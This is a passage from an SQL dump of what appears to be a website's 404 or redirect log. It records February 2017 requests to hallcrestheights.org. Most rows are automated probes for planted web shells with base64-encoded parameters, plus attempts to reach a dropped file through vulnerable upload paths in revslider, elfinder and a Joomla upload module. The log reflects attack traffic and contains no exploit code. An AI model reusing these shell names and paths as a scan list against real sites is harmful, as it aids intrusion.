00:00:00'),(6425,'http://hallcrestheights.org//shootme.php?z3=TFh0T215LnBocA==&z4=Lw==',NULL,'hallcrestheights.org','',2,0,'2017-02-09 13:54:10','0000-00-00 00:00:00'),(6426,'http://hallcrestheights.org//configurationbak.php?z3=TFh0T215LnBocA==&z4=Lw==',NULL,'hallcrestheights.org','',2,0,'2017-02-09 13:54:12','0000-00-00 00:00:00'),(6427,'http://hallcrestheights.org//robots.txt.php?z3=TFh0T215LnBocA==&z4=Lw==',NULL,'hallcrestheights.org','',2,0,'2017-02-09 13:54:14','0000-00-00 00:00:00'),(6428,'http://hallcrestheights.org//jconfig.php?z3=TFh0T215LnBocA==&z4=Lw==',NULL,'hallcrestheights.org','',2,0,'2017-02-09 13:54:16','0000-00-00 00:00:00'),(6429,'http://hallcrestheights.org//media/reads.php?z3=TFh0T215LnBocA==&z4=L21lZGlhLw==',NULL,'hallcrestheights.org','',2,0,'2017-02-09 13:54:19','0000-00-00 00:00:00'),(6430,'http://hallcrestheights.org//media/1ndex.php?z3=TFh0T215LnBocA==&z4=L21lZGlhLw==',NULL,'hallcrestheights.org','',2,0,'2017-02-09 13:54:22','0000-00-00 00:00:00'),(6431,'http://hallcrestheights.org//sql_dump.php?z3=TFh0T215LnBocA==&z4=Lw==',NULL,'hallcrestheights.org','',2,0,'2017-02-09 13:54:24','0000-00-00 00:00:00'),(6432,'http://hallcrestheights.org//images/laj.php?z3=TFh0T215LnBocA==&z4=L2ltYWdlcy8=',NULL,'hallcrestheights.org','',2,0,'2017-02-09 13:54:26','0000-00-00 00:00:00'),(6433,'http://hallcrestheights.org//media/404.php?z3=TFh0T215LnBocA==&z4=L21lZGlhLw==',NULL,'hallcrestheights.org','',2,0,'2017-02-09 13:54:34','0000-00-00 00:00:00'),(6434,'http://hallcrestheights.org//media/tmp.php?z3=TFh0T215LnBocA==&z4=L21lZGlhLw==',NULL,'hallcrestheights.org','',2,0,'2017-02-09 13:54:36','0000-00-00 00:00:00'),(6435,'http://hallcrestheights.org//r3x.php?z3=TFh0T215LnBocA==&z4=Lw==',NULL,'hallcrestheights.org','',2,0,'2017-02-09 13:54:38','0000-00-00 00:00:00'),(6436,'http://hallcrestheights.org//log.php?z3=TFh0T215LnBocA==&z4=Lw==',NULL,'hallcrestheights.org','',2,0,'2017-02-09 13:54:41','0000-00-00 00:00:00'),(6437,'http://hallcrestheights.org//images/stories/0day.php?z3=TFh0T215LnBocA==&z4=L2ltYWdlcy9zdG9yaWVzLw==',NULL,'hallcrestheights.org','',2,0,'2017-02-09 13:54:43','0000-00-00 00:00:00'),(6438,'http://hallcrestheights.org//includes/u2p.php?z3=TFh0T215LnBocA==&z4=L2luY2x1ZGVzLw==',NULL,'hallcrestheights.org','',2,0,'2017-02-09 13:54:45','0000-00-00 00:00:00'),(6439,'http://hallcrestheights.org//images/xxx.php?z3=TFh0T215LnBocA==&z4=L2ltYWdlcy8=',NULL,'hallcrestheights.org','',2,0,'2017-02-09 13:54:49','0000-00-00 00:00:00'),(6440,'http://hallcrestheights.org//al277.php?z3=TFh0T215LnBocA==&z4=Lw==',NULL,'hallcrestheights.org','',2,0,'2017-02-09 13:54:51','0000-00-00 00:00:00'),(6441,'http://hallcrestheights.org//cache/cache_aqbmkwwx.php?z3=TFh0T215LnBocA==&z4=L2NhY2hlLw==',NULL,'hallcrestheights.org','',2,0,'2017-02-09 13:54:55','0000-00-00 00:00:00'),(6442,'http://hallcrestheights.org//install.php?z3=TFh0T215LnBocA==&z4=Lw==',NULL,'hallcrestheights.org','',2,0,'2017-02-09 13:54:57','0000-00-00 00:00:00'),(6443,'http://hallcrestheights.org//dswat.org/wsdl.php?z3=TFh0T215LnBocA==&z4=L2Rzd2F0Lm9yZy8=',NULL,'hallcrestheights.org','',2,0,'2017-02-09 13:54:59','0000-00-00 00:00:00'),(6444,'http://hallcrestheights.org//robot.php?z3=TFh0T215LnBocA==&z4=Lw==',NULL,'hallcrestheights.org','',2,0,'2017-02-09 13:55:01','0000-00-00 00:00:00'),(6445,'http://hallcrestheights.org//wsdl.php?z3=TFh0T215LnBocA==&z4=Lw==',NULL,'hallcrestheights.org','',2,0,'2017-02-09 13:55:04','0000-00-00 00:00:00'),(6446,'http://hallcrestheights.org//goog1es.php?z3=TFh0T215LnBocA==&z4=Lw==',NULL,'hallcrestheights.org','',2,0,'2017-02-09 13:55:06','0000-00-00 00:00:00'),(6447,'http://hallcrestheights.org//site/tmp/cTivrC.php?z3=TFh0T215LnBocA==&z4=L3NpdGUvdG1wLw==',NULL,'hallcrestheights.org','',2,0,'2017-02-09 13:55:08','0000-00-00 00:00:00'),(6448,'http://hallcrestheights.org//update.php?z3=TFh0T215LnBocA==&z4=Lw==',NULL,'hallcrestheights.org','',2,0,'2017-02-09 13:55:10','0000-00-00 00:00:00'),(6449,'http://hallcrestheights.org//includes.php?z3=TFh0T215LnBocA==&z4=Lw==',NULL,'hallcrestheights.org','',2,0,'2017-02-09 13:55:13','0000-00-00 00:00:00'),(6450,'http://hallcrestheights.org//wp-main.php?z3=TFh0T215LnBocA==&z4=Lw==',NULL,'hallcrestheights.org','',2,0,'2017-02-09 13:55:15','0000-00-00 00:00:00'),(6451,'http://hallcrestheights.org//news.php?z3=TFh0T215LnBocA==&z4=Lw==',NULL,'hallcrestheights.org','',2,0,'2017-02-09 13:55:17','0000-00-00 00:00:00'),(6452,'http://hallcrestheights.org//images/al277.php?z3=TFh0T215LnBocA==&z4=L2ltYWdlcy8=',NULL,'hallcrestheights.org','',2,0,'2017-02-09 13:55:19','0000-00-00 00:00:00'),(6453,'http://hallcrestheights.org//webconfig.txt.php?z3=TFh0T215LnBocA==&z4=Lw==',NULL,'hallcrestheights.org','',2,0,'2017-02-09 13:55:22','0000-00-00 00:00:00'),(6454,'http://hallcrestheights.org//cache/cachee.php?z3=TFh0T215LnBocA==&z4=L2NhY2hlLw==',NULL,'hallcrestheights.org','',2,0,'2017-02-09 13:55:25','0000-00-00 00:00:00'),(6455,'http://hallcrestheights.org//thumb.php?z3=TFh0T215LnBocA==&z4=Lw==',NULL,'hallcrestheights.org','',2,0,'2017-02-09 13:55:27','0000-00-00 00:00:00'),(6456,'http://hallcrestheights.org//SessionController.php?z3=TFh0T215LnBocA==&z4=Lw==',NULL,'hallcrestheights.org','',2,0,'2017-02-09 13:55:33','0000-00-00 00:00:00'),(6457,'http://hallcrestheights.org//maill.php?z3=TFh0T215LnBocA==&z4=Lw==',NULL,'hallcrestheights.org','',2,0,'2017-02-09 13:55:35','0000-00-00 00:00:00'),(6458,'http://hallcrestheights.org//error-log.php?z3=TFh0T215LnBocA==&z4=Lw==',NULL,'hallcrestheights.org','',2,0,'2017-02-09 13:55:39','0000-00-00 00:00:00'),(6459,'http://hallcrestheights.org//authenticating.php?z3=TFh0T215LnBocA==&z4=Lw==',NULL,'hallcrestheights.org','',2,0,'2017-02-09 13:55:42','0000-00-00 00:00:00'),(6460,'http://hallcrestheights.org//google-assist.php?z3=TFh0T215LnBocA==&z4=Lw==',NULL,'hallcrestheights.org','',2,0,'2017-02-09 13:55:44','0000-00-00 00:00:00'),(6461,'http://hallcrestheights.org//images/google-assist.php?z3=TFh0T215LnBocA==&z4=L2ltYWdlcy8=',NULL,'hallcrestheights.org','',2,0,'2017-02-09 13:55:46','0000-00-00 00:00:00'),(6462,'http://hallcrestheights.org//images/robots.txt.php?z3=TFh0T215LnBocA==&z4=L2ltYWdlcy8=',NULL,'hallcrestheights.org','',2,0,'2017-02-09 13:55:48','0000-00-00 00:00:00'),(6463,'http://hallcrestheights.org//elements.php?z3=TFh0T215LnBocA==&z4=Lw==',NULL,'hallcrestheights.org','',2,0,'2017-02-09 13:55:51','0000-00-00 00:00:00'),(6464,'http://hallcrestheights.org//xmlsrpc.php?z3=TFh0T215LnBocA==&z4=Lw==',NULL,'hallcrestheights.org','',2,0,'2017-02-09 13:55:53','0000-00-00 00:00:00'),(6465,'http://hallcrestheights.org//wp-cache.php?z3=TFh0T215LnBocA==&z4=Lw==',NULL,'hallcrestheights.org','',2,0,'2017-02-09 13:55:56','0000-00-00 00:00:00'),(6466,'http://hallcrestheights.org//images/404.php?z3=TFh0T215LnBocA==&z4=L2ltYWdlcy8=',NULL,'hallcrestheights.org','',2,0,'2017-02-09 13:55:58','0000-00-00 00:00:00'),(6467,'http://hallcrestheights.org//images/head.php?z3=TFh0T215LnBocA==&z4=L2ltYWdlcy8=',NULL,'hallcrestheights.org','',2,0,'2017-02-09 13:56:00','0000-00-00 00:00:00'),(6468,'http://hallcrestheights.org//cache/support.php?z3=TFh0T215LnBocA==&z4=L2NhY2hlLw==',NULL,'hallcrestheights.org','',2,0,'2017-02-09 13:56:02','0000-00-00 00:00:00'),(6469,'http://hallcrestheights.org//RoseLeif.php?z3=TFh0T215LnBocA==&z4=Lw==',NULL,'hallcrestheights.org','',2,0,'2017-02-09 13:56:05','0000-00-00 00:00:00'),(6470,'http://hallcrestheights.org//Abbrevsprl.php?z3=TFh0T215LnBocA==&z4=Lw==',NULL,'hallcrestheights.org','',2,0,'2017-02-09 13:56:07','0000-00-00 00:00:00'),(6471,'http://hallcrestheights.org//show.php?z3=TFh0T215LnBocA==&z4=Lw==',NULL,'hallcrestheights.org','',2,0,'2017-02-09 13:56:09','0000-00-00 00:00:00'),(6472,'http://hallcrestheights.org//images/defau1t.php?z3=TFh0T215LnBocA==&z4=L2ltYWdlcy8=',NULL,'hallcrestheights.org','',2,0,'2017-02-09 13:56:11','0000-00-00 00:00:00'),(6473,'http://hallcrestheights.org//cli/40dd1d.php?z3=TFh0T215LnBocA==&z4=L2NsaS8=',NULL,'hallcrestheights.org','',2,0,'2017-02-09 13:56:13','0000-00-00 00:00:00'),(6474,'http://hallcrestheights.org//infos.php?z3=TFh0T215LnBocA==&z4=Lw==',NULL,'hallcrestheights.org','',2,0,'2017-02-09 13:56:17','0000-00-00 00:00:00'),(6475,'http://hallcrestheights.org//cache/defau1t.php?z3=TFh0T215LnBocA==&z4=L2NhY2hlLw==',NULL,'hallcrestheights.org','',2,0,'2017-02-09 13:56:19','0000-00-00 00:00:00'),(6476,'http://hallcrestheights.org//bookmark.php?z3=TFh0T215LnBocA==&z4=Lw==',NULL,'hallcrestheights.org','',2,0,'2017-02-09 13:56:22','0000-00-00 00:00:00'),(6477,'http://hallcrestheights.org//configbak.php?z3=TFh0T215LnBocA==&z4=Lw==',NULL,'hallcrestheights.org','',2,0,'2017-02-09 13:56:24','0000-00-00 00:00:00'),(6478,'http://hallcrestheights.org//wp-data.php?z3=TFh0T215LnBocA==&z4=Lw==',NULL,'hallcrestheights.org','',2,0,'2017-02-09 13:56:26','0000-00-00 00:00:00'),(6479,'http://hallcrestheights.org//wp-content/plugins/Fbrrchive.php?z3=TFh0T215LnBocA==&z4=L3dwLWNvbnRlbnQvcGx1Z2lucy8=',NULL,'hallcrestheights.org','',2,0,'2017-02-09 13:56:28','0000-00-00 00:00:00'),(6480,'http://hallcrestheights.org//wp-content/uploads/Fbrrchive.php?z3=TFh0T215LnBocA==&z4=L3dwLWNvbnRlbnQvdXBsb2Fkcy8=',NULL,'hallcrestheights.org','',2,0,'2017-02-09 13:56:31','0000-00-00 00:00:00'),(6481,'http://hallcrestheights.org//wp-content/plugins/myshe.php?z3=TFh0T215LnBocA==&z4=L3dwLWNvbnRlbnQvcGx1Z2lucy8=',NULL,'hallcrestheights.org','',2,0,'2017-02-09 13:56:33','0000-00-00 00:00:00'),(6482,'http://hallcrestheights.org//wp-content/plugins/wp-cache.php?z3=TFh0T215LnBocA==&z4=L3dwLWNvbnRlbnQvcGx1Z2lucy8=',NULL,'hallcrestheights.org','',2,0,'2017-02-09 13:56:36','0000-00-00 00:00:00'),(6483,'http://hallcrestheights.org//wp-content/plugins/wp-footers.php?z3=TFh0T215LnBocA==&z4=L3dwLWNvbnRlbnQvcGx1Z2lucy8=',NULL,'hallcrestheights.org','',2,0,'2017-02-09 13:56:38','0000-00-00 00:00:00'),(6484,'http://hallcrestheights.org//wp-content/plugins/wpfootes.php?z3=TFh0T215LnBocA==&z4=L3dwLWNvbnRlbnQvcGx1Z2lucy8=',NULL,'hallcrestheights.org','',2,0,'2017-02-09 13:56:40','0000-00-00 00:00:00'),(6485,'http://hallcrestheights.org//wp-content/plugins/sql_dump.php?z3=TFh0T215LnBocA==&z4=L3dwLWNvbnRlbnQvcGx1Z2lucy8=',NULL,'hallcrestheights.org','',2,0,'2017-02-09 13:56:42','0000-00-00 00:00:00'),(6486,'http://hallcrestheights.org//wp-content/plugins/SocketIontrol.php?z3=TFh0T215LnBocA==&z4=L3dwLWNvbnRlbnQvcGx1Z2lucy8=',NULL,'hallcrestheights.org','',2,0,'2017-02-09 13:56:46','0000-00-00 00:00:00'),(6487,'http://hallcrestheights.org//wp-content/plugins/SocketIasrgasfontrol.php?z3=TFh0T215LnBocA==&z4=L3dwLWNvbnRlbnQvcGx1Z2lucy8=',NULL,'hallcrestheights.org','',1,0,'2017-02-09 13:56:49','0000-00-00 00:00:00'),(6488,'http://hallcrestheights.org//wp-content/plugins/Analyser.php?z3=TFh0T215LnBocA==&z4=L3dwLWNvbnRlbnQvcGx1Z2lucy8=',NULL,'hallcrestheights.org','',2,0,'2017-02-09 13:57:36','0000-00-00 00:00:00'),(6489,'http://hallcrestheights.org//cache/list.php?z3=TFh0T215LnBocA==&z4=L2NhY2hlLw==',NULL,'hallcrestheights.org','',2,0,'2017-02-09 13:57:38','0000-00-00 00:00:00'),(6490,'http://hallcrestheights.org//modules/mod_simplefileuploadv1.3/elements/LXtOmy.php',NULL,'','',1,0,'2017-02-09 13:58:24','0000-00-00 00:00:00'),(6491,'http://hallcrestheights.org//wp-content/plugins/revslider/temp/update_extract/LXtOmy.php',NULL,'','',1,0,'2017-02-09 13:58:26','0000-00-00 00:00:00'),(6492,'http://hallcrestheights.org//wp-content/uploads/LXtOmy.php',NULL,'','',1,0,'2017-02-09 13:58:28','0000-00-00 00:00:00'),(6493,'http://hallcrestheights.org//LXtOmy.php',NULL,'','',1,0,'2017-02-09 13:58:30','0000-00-00 00:00:00'),(6494,'http://hallcrestheights.org//sites/all/libraries/elfinder/files/LXtOmy.php',NULL,'','',1,0,'2017-02-09 13:58:31','0000-00-00 00:00:00'),(6495,'http://www.hallcrestheights.org/i20162630-k16945-nfrk-opdobbu-mgolzes-rkwtz-qtqbs/',NULL,'http://search.yahoo.co.jp/','',5,0,'2017-02-10 05:15:57','0000-00-00 00:00:00'),(6496,'http://hallcrestheights.org/ixnmu-eahw-hioz/hjxbnwpg-i20162629-eyooayik-uksszq-k34474-cebaq.htm',NULL,'','',1,0,'2017-02-10 15:40:12','0000-00-00 00:00:00'),(6497,'http://hallcrestheights.org/dbkeys.php',NULL,'','',1,0,'2017-02-10 22:39:19','0000-00-00 00:00:00'),(6498,'http://hallcrestheights.org/vqjny-spvh-k34074-oljp/eurrtpil-uourxivl-i20162629-btrhnn-mtqzk-owtsxp.htm',NULL,'','',2,0,'2017-02-11 02:56:58','0000-00-00 00:00:00'),(6499,'http://hallcrestheights.org/dvisc-iwbv/wkux-krbzomsm-i20162629-k33874-vuclzuph.htm',NULL,'','',2,0,'2017-02-11 03:44:16','0000-00-00 00:00:00'),(6500,'http://hallcrestheights.org/create-an-account.html',NULL,'http://hallcrestheights.org/create-an-account.html','',78,0,'2017-02-11 06:28:20','0000-00-00 00:00:00'),(6501,'http://hallcrestheights.org/ryvhr-i20162629-hmqt-k54824-yysl-lgeajanp-dmefnxhq-fhjdyh.htm',NULL,'','',3,0,'2017-02-11 10:20:03','0000-00-00 00:00:00'),(6502,'http://www.hallcrestheights.org/HH0908.pdf',NULL,'','',13,0,'2017-02-11 10:39:57','0000-00-00 00:00:00'),(6503,'http://hallcrestheights.org/i20162628-upttmn-beatgr-k25016-bnqcdc-ncxr-dhcpgz-zdllim.htm',NULL,'','',2,0,'2017-02-11 14:06:47','0000-00-00 00:00:00'),(6504,'http://hallcrestheights.org/pcscq-rufu-npkw-xpoideot-k34224-wtvsoarm-osmgep-lalhe-liyrqi-yqfuf-i20162629-xvugowo.htm',NULL,'','',1,0,'2017-02-11 22:54:56','0000-00-00 00:00:00'),(6505,'http://hallcrestheights.org/ixnmue-ahwhio-i20162628-zhjxbn-wpge/yooayi-kukssz-qceba-qdomytn-k45966-iholbde-ntafym-luzextl.htm',NULL,'','',1,0,'2017-02-12 08:15:09','0000-00-00 00:00:00'),(6506,'http://hallcrestheights.org/fadlaj-fnlgfp-cvwgmy-hdec-wxbdeu-dkovfi-k25116-ibptq-uhzxchh-i20162628-rmxagfp-apuhgf.htm',NULL,'','',5,0,'2017-02-12 14:25:48','0000-00-00 00:00:00'),(6507,'http://hallcrestheights.org/k55174-edzvd-lqco-mnnm/mcawvbfu-i20162629-japyvrlf-lxhqjk-uhkcm.htm',NULL,'','',1,0,'2017-02-12 17:05:48','0000-00-00 00:00:00'),(6508,'http://hallcrestheights.org/dvisc-i20162629-k55324-iwbv-wkux-krbzomsm-vuclzuph-vqawuo-xzmnp-zvsgcr-lycmc.htm',NULL,'','',4,0,'2017-02-12 17:35:07','0000-00-00 00:00:00'),(6509,'http://hallcrestheights.org/phpmyadmin',NULL,'http://hallcrestheights.org/phpmyadmin','',1,0,'2017-02-12 21:16:31','0000-00-00 00:00:00'),(6510,'http://hallcrestheights.org/mrcqg-i20162629-beif-k34274-uwgr-abtnwyrq/semgwkow-hmemxg-kucyb-npzkic-vejxk-ulzjcjk-ntsxjln-uuuv.htm',NULL,'','',1,0,'2017-02-13 02:24:36','0000-00-00 00:00:00'),(6511,'http://www.hallcrestheights.org/yembjvh-k56573-tqqdc-i20162630-kzfltz-terqbw/',NULL,'','',12,0,'2017-02-13 02:37:36','0000-00-00 00:00:00'),(6512,'http://www.hallcrestheights.org/about/index.html',NULL,'','',3,0,'2017-02-13 03:19:40','0000-00-00 00:00:00'),(6513,'http://www.hallcrestheights.org/k19105-oiyi-zgolrcm-wfbsnop-dgfnh-i20162629-skrlj/',NULL,'http://search.yahoo.co.jp/','',2,0,'2017-02-14 01:38:14','0000-00-00 00:00:00'),(6514,'http://www.hallcrestheights.org/k37105-soeg-szxyife-tvtndyu-uhvfc-i20162629-yzlsx/',NULL,'https://www.google.co.jp/','',4,0,'2017-02-14 09:57:05','0000-00-00 00:00:00'),(6515,'http://www.hallcrestheights.org/i20162635-k5200-fadlajfn-lgfpc-vwgmyhde-cwxbdeu-dkov.htm',NULL,'https://www.google.co.jp/','',14,0,'2017-02-14 11:12:53','0000-00-00 00:00:00'),(6516,'http://hallcrestheights.org/zmkue-dtzj-k55624-ivyo-qxifgxuh-i20162629-xptvuhmi-wnzkor-pvubf.htm',NULL,'','',1,0,'2017-02-14 17:05:08','0000-00-00 00:00:00'),(6517,'http://hallcrestheights.org/gnfzn-i20162629-xvjx-palt-itjshkyj-yldpijaa-mdurta-enpgg-wtdvlx-k55424-tdqku-nfglqrh-zyonxfe-qnzs.htm',NULL,'','',2,0,'2017-02-14 19:06:37','0000-00-00 00:00:00'),(6518,'http://www.hallcrestheights.org/dvisc-iwbv-k58964-wkux-krbzomsm-i20162632-vuclzuph-vqawuo.htm',NULL,'','',6,0,'2017-02-15 02:32:07','0000-00-00 00:00:00'),(6519,'http://hallcrestheights.org/gnfzn-i20162629-k34624-xvjx-palt-itjshkyj-yldpijaa-mdurta-enpgg-wtdvlx-tdqku.htm',NULL,'','',1,0,'2017-02-16 01:25:07','0000-00-00 00:00:00'),(6520,'http://hallcrestheights.org/pcscq-rufu-npkw-xpoideot-i20162629-k55024-wtvsoarm.htm',NULL,'','',2,0,'2017-02-16 02:34:44','0000-00-00 00:00:00'),(6521,'http://hallcrestheights.org/k33624-mrcqg-beif-uwgr-abtnwyrq-semgwkow-i20162629-hmemxg-kucyb-npzkic.htm',NULL,'','',2,0,'2017-02-16 09:14:07','0000-00-00 00:00:00'),(6522,'http://hallcrestheights.org/upttm-nbea-tgrb-nqcdcncx-i20162629-k34324-rdhcpgzz.htm',NULL,'','',2,0,'2017-02-16 14:35:15','0000-00-00 00:00:00'),(6523,'http://hallcrestheights.org/mrcqgb-eifuwg-i20162628-rabtnw-yrqs-emgwko-whmemx-gkucy-k46416-bnpzkic-vejxkul-zjcjkn-tsxjlnu.htm',NULL,'','',2,0,'2017-02-16 15:35:16','0000-00-00 00:00:00'),(6524,'http://hallcrestheights.org/gnfzn-i20162629-xvjx/k33974-palt-itjshkyj.htm',NULL,'','',1,0,'2017-02-16 18:46:41','0000-00-00 00:00:00'),(6525,'http://hallcrestheights.org/lugdl-i20162629-trsm/k34574-xxhy-pzqjllzo-hnjumnte-cwfogy.htm',NULL,'','',2,0,'2017-02-16 20:49:11','0000-00-00 00:00:00'),(6526,'http://hallcrestheights.org/i20162628-ixnmue-ahwhio-k46616-zhjxbn-wpge-yooayi-kukssz.htm',NULL,'','',1,0,'2017-02-17 00:42:42','0000-00-00 00:00:00'),(6527,'http://hallcrestheights.org//images/1ndex.php?z3=RTJvcWZ2LnBocA==&z4=L2ltYWdlcy8=',NULL,'hallcrestheights.org','',1,0,'2017-02-17 06:07:29','0000-00-00 00:00:00'),(6528,'http://hallcrestheights.org//sqlbak.php?z3=RTJvcWZ2LnBocA==&z4=Lw==',NULL,'hallcrestheights.org','',2,0,'2017-02-17 06:07:30','0000-00-00 00:00:00'),(6529,'http://hallcrestheights.org//email.php?z3=RTJvcWZ2LnBocA==&z4=Lw==',NULL,'hallcrestheights.org','',2,0,'2017-02-17 06:07:37','0000-00-00 00:00:00'),(6530,'http://hallcrestheights.org//functions.php?z3=RTJvcWZ2LnBocA==&z4=Lw==',NULL,'hallcrestheights.org','',2,0,'2017-02-17 06:08:14','0000-00-00 00:00:00'),(6531,'http://hallcrestheights.org//cache/news.php?z3=RTJvcWZ2LnBocA==&z4=L2NhY2hlLw==',NULL,'hallcrestheights.org','',2,0,'2017-02-17 06:08:19','0000-00-00 00:00:00'),(6532,'http://hallcrestheights.org//tmp.php?z3=RTJvcWZ2LnBocA==&z4=Lw==',NULL,'hallcrestheights.org','',2,0,'2017-02-17 06:08:22','0000-00-00 00:00:00'),(6533,'http://hallcrestheights.org//shootme.php?z3=RTJvcWZ2LnBocA==&z4=Lw==',NULL,'hallcrestheights.org','',2,0,'2017-02-17 06:08:25','0000-00-00 00:00:00'),(6534,'http://hallcrestheights.org//configurationbak.php?z3=RTJvcWZ2LnBocA==&z4=Lw==',NULL,'hallcrestheights.org','',2,0,'2017-02-17 06:08:28','0000-00-00 00:00:00'),(6535,'http://hallcrestheights.org//robots.txt.php?z3=RTJvcWZ2LnBocA==&z4=Lw==',NULL,'hallcrestheights.org','',2,0,'2017-02-17 06:08:32','0000-00-00 00:00:00'),(6536,'http://hallcrestheights.org//jconfig.php?z3=RTJvcWZ2LnBocA==&z4=Lw==',NULL,'hallcrestheights.org','',2,0,'2017-02-17 06:08:34','0000-00-00 00:00:00'),(6537,'http://hallcrestheights.org//media/reads.php?z3=RTJvcWZ2LnBocA==&z4=L21lZGlhLw==',NULL,'hallcrestheights.org','',2,0,'2017-02-17 06:08:38','0000-00-00 00:00:00'),(6538,'http://hallcrestheights.org//media/1ndex.php?z3=RTJvcWZ2LnBocA==&z4=L21lZGlhLw==',NULL,'hallcrestheights.org','',2,0,'2017-02-17 06:08:42','0000-00-00 00:00:00'),(6539,'http://hallcrestheights.org//images/laj.php?z3=RTJvcWZ2LnBocA==&z4=L2ltYWdlcy8=',NULL,'hallcrestheights.org','',1,0,'2017-02-17 06:11:04','0000-00-00 00:00:00'),(6540,'http://hallcrestheights.org//media/404.php?z3=RTJvcWZ2LnBocA==&z4=L21lZGlhLw==',NULL,'hallcrestheights.org','',1,0,'2017-02-17 06:14:52','0000-00-00 00:00:00'),(6541,'http://hallcrestheights.org//r3x.php?z3=RTJvcWZ2LnBocA==&z4=Lw==',NULL,'hallcrestheights.org','',1,0,'2017-02-17 06:19:27','0000-00-00 00:00:00'),(6542,'http://hallcrestheights.org//log.php?z3=RTJvcWZ2LnBocA==&z4=Lw==',NULL,'hallcrestheights.org','',1,0,'2017-02-17 06:19:32','0000-00-00 00:00:00'),(6543,'http://hallcrestheights.org//images/stories/0day.php?z3=RTJvcWZ2LnBocA==&z4=L2ltYWdlcy9zdG9yaWVzLw==',NULL,'hallcrestheights.org','',1,0,'2017-02-17 06:21:27','0000-00-00 00:00:00'),(6544,'http://hallcrestheights.org//images/xxx.php?z3=RTJvcWZ2LnBocA==&z4=L2ltYWdlcy8=',NULL,'hallcrestheights.org','',2,0,'2017-02-17 06:25:02','0000-00-00 00:00:00'),(6545,'http://hallcrestheights.org//site/tmp/cTivrC.php?z3=RTJvcWZ2LnBocA==&z4=L3NpdGUvdG1wLw==',NULL,'hallcrestheights.org','',1,0,'2017-02-17 06:43:13','0000-00-00 00:00:00'),(6546,'http://hallcrestheights.org//update.php?z3=RTJvcWZ2LnBocA==&z4=Lw==',NULL,'hallcrestheights.org','',1,0,'2017-02-17 06:43:23','0000-00-00 00:00:00'),(6547,'http://hallcrestheights.org//news.php?z3=RTJvcWZ2LnBocA==&z4=Lw==',NULL,'hallcrestheights.org','',1,0,'2017-02-17 06:51:40','0000-00-00 00:00:00'),(6548,'http://hallcrestheights.org//thumb.php?z3=RTJvcWZ2LnBocA==&z4=Lw==',NULL,'hallcrestheights.org','',1,0,'2017-02-17 07:03:13','0000-00-00 00:00:00'),(6549,'http://hallcrestheights.org//images/google-assist.php?z3=RTJvcWZ2LnBocA==&z4=L2ltYWdlcy8=',NULL,'hallcrestheights.org','',2,0,'2017-02-17 07:11:40','0000-00-00 00:00:00'),(6550,'http://hallcrestheights.org//images/robots.txt.php?z3=RTJvcWZ2LnBocA==&z4=L2ltYWdlcy8=',NULL,'hallcrestheights.org','',2,0,'2017-02-17 07:11:45','0000-00-00 00:00:00'),(6551,'http://hallcrestheights.org//elements.php?z3=RTJvcWZ2LnBocA==&z4=Lw==',NULL,'hallcrestheights.org','',2,0,'2017-02-17 07:11:48','0000-00-00 00:00:00'),(6552,'http://hallcrestheights.org//xmlsrpc.php?z3=RTJvcWZ2LnBocA==&z4=Lw==',NULL,'hallcrestheights.org','',2,0,'2017-02-17 07:11:53','0000-00-00 00:00:00'),(6553,'http://hallcrestheights.org//wp-cache.php?z3=RTJvcWZ2LnBocA==&z4=Lw==',NULL,'hallcrestheights.org','',2,0,'2017-02-17 07:11:57','0000-00-00 00:00:00'),(6554,'http://hallcrestheights.org//images/404.php?z3=RTJvcWZ2LnBocA==&z4=L2ltYWdlcy8=',NULL,'hallcrestheights.org','',2,0,'2017-02-17 07:12:01','0000-00-00 00:00:00'),(6555,'http://hallcrestheights.org//images/head.php?z3=RTJvcWZ2LnBocA==&z4=L2ltYWdlcy8=',NULL,'hallcrestheights.org','',2,0,'2017-02-17 07:12:05','0000-00-00 00:00:00'),(6556,'http://hallcrestheights.org//cache/support.php?z3=RTJvcWZ2LnBocA==&z4=L2NhY2hlLw==',NULL,'hallcrestheights.org','',2,0,'2017-02-17 07:12:09','0000-00-00 00:00:00'),(6557,'http://hallcrestheights.org//RoseLeif.php?z3=RTJvcWZ2LnBocA==&z4=Lw==',NULL,'hallcrestheights.org','',2,0,'2017-02-17 07:12:12','0000-00-00 00:00:00'),(6558,'http://hallcrestheights.org//Abbrevsprl.php?z3=RTJvcWZ2LnBocA==&z4=Lw==',NULL,'hallcrestheights.org','',2,0,'2017-02-17 07:12:15','0000-00-00 00:00:00'),(6559,'http://hallcrestheights.org//show.php?z3=RTJvcWZ2LnBocA==&z4=Lw==',NULL,'hallcrestheights.org','',2,0,'2017-02-17 07:12:19','0000-00-00 00:00:00'),(6560,'http://hallcrestheights.org//images/defau1t.php?z3=RTJvcWZ2LnBocA==&z4=L2ltYWdlcy8=',NULL,'hallcrestheights.org','',2,0,'2017-02-17 07:12:21','0000-00-00 00:00:00'),(6561,'http://hallcrestheights.org//cli/40dd1d.php?z3=RTJvcWZ2LnBocA==&z4=L2NsaS8=',NULL,'hallcrestheights.org','',2,0,'2017-02-17 07:12:24','0000-00-00 00:00:00'),(6562,'http://hallcrestheights.org//infos.php?z3=RTJvcWZ2LnBocA==&z4=Lw==',NULL,'hallcrestheights.org','',2,0,'2017-02-17 07:12:30','0000-00-00 00:00:00'),(6563,'http://hallcrestheights.org//cache/defau1t.php?z3=RTJvcWZ2LnBocA==&z4=L2NhY2hlLw==',NULL,'hallcrestheights.org','',2,0,'2017-02-17 07:12:33','0000-00-00 00:00:00'),(6564,'http://hallcrestheights.org//bookmark.php?z3=RTJvcWZ2LnBocA==&z4=Lw==',NULL,'hallcrestheights.org','',2,0,'2017-02-17 07:12:35','0000-00-00 00:00:00'),(6565,'http://hallcrestheights.org//configbak.php?z3=RTJvcWZ2LnBocA==&z4=Lw==',NULL,'hallcrestheights.org','',2,0,'2017-02-17 07:12:37','0000-00-00 00:00:00'),(6566,'http://hallcrestheights.org//wp-data.php?z3=RTJvcWZ2LnBocA==&z4=Lw==',NULL,'hallcrestheights.org','',2,0,'2017-02-17 07:12:40','0000-00-00 00:00:00'),(6567,'http://hallcrestheights.org//wp-content/plugins/Fbrrchive.php?z3=RTJvcWZ2LnBocA==&z4=L3dwLWNvbnRlbnQvcGx1Z2lucy8=',NULL,'hallcrestheights.org','',2,0,'2017-02-17 07:12:42','0000-00-00 00:00:00'),(6568,'http://hallcrestheights.org//wp-content/uploads/Fbrrchive.php?z3=RTJvcWZ2LnBocA==&z4=L3dwLWNvbnRlbnQvdXBsb2Fkcy8=',NULL,'hallcrestheights.org','',2,0,'2017-02-17 07:12:44','0000-00-00 